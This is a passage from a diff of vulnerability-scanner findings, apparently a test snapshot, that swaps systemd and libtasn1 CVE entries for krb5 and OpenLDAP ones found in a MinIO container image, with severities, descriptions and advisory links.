vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openssl: RSA authentication weakness", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", - }, - { - "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - }, - { - "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - }, - { - "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - }, - { - "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", + "fixedVersion": "1.18.3-6+deb11u3", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "id": "CVE-2023-2953", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2023-2953", + "https://bugs.openldap.org/show_bug.cgi?id=9904", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "https://www.cve.org/CVERecord?id=CVE-2023-2953", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "null pointer dereference in ber_memalloc_x function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2023-2953", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://access.redhat.com/security/cve/CVE-2023-2953", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "id": "CVE-2015-3276", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "http://www.securitytracker.com/id/1034221", + "https://access.redhat.com/security/cve/CVE-2015-3276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "https://linux.oracle.com/cve/CVE-2015-3276.html", + "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "https://www.cve.org/CVERecord?id=CVE-2015-3276", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "incorrect multi-keyword mode cipherstring parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/nvd/cve-2015-3276", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://www.securitytracker.com/id/1034221", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://access.redhat.com/security/cve/CVE-2015-3276", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-14159", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://www.openldap.org/its/index.cgi?findid=8703", + "https://access.redhat.com/security/cve/CVE-2017-14159", + "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Privilege escalation via PID file manipulation", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://avd.aquasec.com/nvd/cve-2017-14159", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "http://www.openldap.org/its/index.cgi?findid=8703", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://access.redhat.com/security/cve/CVE-2017-14159", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "4.16.0-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.16.0-2", - "packageName": "libtasn1-6", + "id": "CVE-2017-17740", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "https://access.redhat.com/security/cve/CVE-2017-17740", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://avd.aquasec.com/nvd/cve-2017-17740", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "https://access.redhat.com/security/cve/CVE-2017-17740", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-15719", + "installedVersion": "2.4.57+dfsg-3+deb11u1", + "packageName": "libldap-2.4-2", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "https://access.redhat.com/errata/RHBA-2019:3674", + "https://access.redhat.com/security/cve/CVE-2020-15719", + "https://bugs.openldap.org/show_bug.cgi?id=9266", + "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + ], + }, + "category": "Vulnerability", + "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openldap: Certificate validation incorrectly matches name against CN-ID", + "references": [ { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://avd.aquasec.com/nvd/cve-2020-15719", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://access.redhat.com/errata/RHBA-2019:3674", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-15719", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", }, { "type": "URL", - "value": 